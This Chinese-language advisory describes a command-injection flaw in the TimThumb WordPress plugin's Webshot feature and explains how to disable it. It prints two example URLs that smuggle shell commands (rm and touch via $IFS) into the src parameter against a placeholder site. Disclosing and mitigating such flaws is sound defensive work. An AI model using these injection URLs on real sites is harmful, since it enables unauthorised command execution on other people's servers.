TimThumb Webshots代码漏洞

TimThumb WordPress的插件版本2.8.13发现的重大弱点，就在于它的“ Webshot “功能启用时，允许攻击者在远程网站上执行命令。

该漏洞允许攻击者远程受影响的网站上执行任意PHP代码。一旦PHP代码已经被执行，该网站很可能被破坏的攻击者想要的方式。到现在为止，没有任何可用于漏洞补丁。

“ 用一个简单的命令，攻击者可以创建，删除和修改服务器上的任何文件“安全专家说。

使用下面的命令，黑客可以创建，删除和修改服务器上的任何文件：

http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://vulnerablesite.com/$(rm$IFS/tmp/a.txt)

http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=http://vulnerablesite.com/$(touch$IFS/tmp/a.txt)

检查和禁用TIMTHUMB“WEBSHOT”

你的主题或插件目录找到 timthumb.php，搜索“WEBSHOT_ENABLED“

如果发现值为 true 如：（’WEBSHOT_ENABLED’，true）

请将该值设置为“false“，即（’WEBSHOT_ENABLED’，false）